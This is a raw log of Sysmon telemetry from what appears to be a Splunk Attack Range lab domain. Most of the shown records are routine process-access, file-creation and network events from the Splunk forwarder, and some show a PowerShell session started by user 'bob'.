10341000x80000000000000001054754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.190{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:55.689{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64A8B17E0541F55EBB6314329570EA2A,SHA256=81120E7C0AF0C93BED47FCB6D99C6FAB72F58A287A4BEA06007481D4E895407C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:55.361{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2362031FAB1AD6DF758612057CC60C42,SHA256=3263F66D0BD840BB458948B0CD97339E6F2CE7DF79E964CD107A450554DC96BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:55.190{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7098B444BA5D05B5A8E01310BEBC6AB4,SHA256=04985468B8E24E1BCD4B2F5C663E594504CF438ADA9C5DD008A6091282A08B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:55.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEAC0A9473D00E9F55DC0AACC1101EA8,SHA256=FB335687061CC4178894ACB78AD9E0FA9F01597F14E107C4A44EBBF29A1F8CF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:55.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04E36365C2237E66041194ED9ADC5E5F,SHA256=159586B5154D8EF676E869671C02AA528985EB182A1F447FD485402C8AC03DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:56.720{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E7A362D5A439DC87220AE9476D5F97,SHA256=F9FE4B2A6E8118D203F8F6702919A5BA91DE8592A4A8CCED164750315D12949C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:56.376{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC809090B09BF519D538078A9948EDA,SHA256=3E2B369FEE630D69CE5314793E9A1D8AFEFFB7D6C96B5FE03D48107B77F24C86,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:54.098{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-24406-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001054761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:57.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=364A95FEAE88C0B428EC751E9D571669,SHA256=83C42CD935CE2FF15DBBED9EB4E440CD96CF9E61EE273674EBC29FC2ACA7173C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:57.408{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00EF97D72C8C73AF8A78DFA027440826,SHA256=02C459818C36C547EFFE9512BA7215BCCD2C575781BE2AD0202B02EA98F8315C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:57.373{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:58.773{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10371F50A39B216D10D185EC0929F486,SHA256=CEFACCCCD0022648EEB5E5F4221C3CB10FABB07AAE636223E56D62CC4DB1BA9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:58.439{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163D536BD04ED0534DEC9595F3BA471B,SHA256=0A6E3914ACD465B2E8F338E818E13E3D945B0BCADE181B259071B6C1F9A9A303,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:59.773{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F750955B5D44145ABFE01F289C6392,SHA256=FAE02F408DDE9FCB022D407A97F066697450452EA38F59ECAFCF7BAAC8902481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:59.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C89F28585091B81329FA2171E5434C79,SHA256=CC25490D3E054163D6B0D8F50A6553855C5A64B66E2BE93C55627838715D8CF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.888{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61971-false10.0.1.12-8089- 354300x80000000000000001054763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.700{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61970-false10.0.1.12-8000- 354300x8000000000000000810412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:57.228{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57465-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001054768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.417{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61972-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001054767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.417{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61972-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001054766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:00.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE534B543730738DC870F5EFB5530E04,SHA256=3203BA9FB6C0DEDA552FD68A94213107CA313AE8DBE48510CAE38F8C8ED55C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:00.486{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBB52B610F926B886C1B5242CA5CEC57,SHA256=401016147934927E371A30AC5FB3A5A72CDA584278DCD94A5EC111CFD7B905BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:01.789{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5D7A307D54896B4E050029E3BE3F38,SHA256=B02DD5AB1D0010295FBBFEFDE411B11C4DCDD603F30ADBC77EE25455D9A47576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:01.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2FF89DEA84555DBCDCA9B15EBFA0BD8,SHA256=E69903E14399D9C23638E570E4D2B5D16440C629C353C5EB50EC14CC25EA4732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.978{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_i0hkp330.diw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.978{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_pjlfnqqq.tuu.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.891{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_pjlfnqqq.tuu.ps12021-07-12 08:08:02.891 10341000x80000000000000001054809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.821{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:02.528{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28874BE5A5C97FFF369C0A3FD5A7B26F,SHA256=7B0B7A65EB4AE91AE67C5D1ADAF1EE778176DE22C19E44B4C7EF7BDCC629967B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsP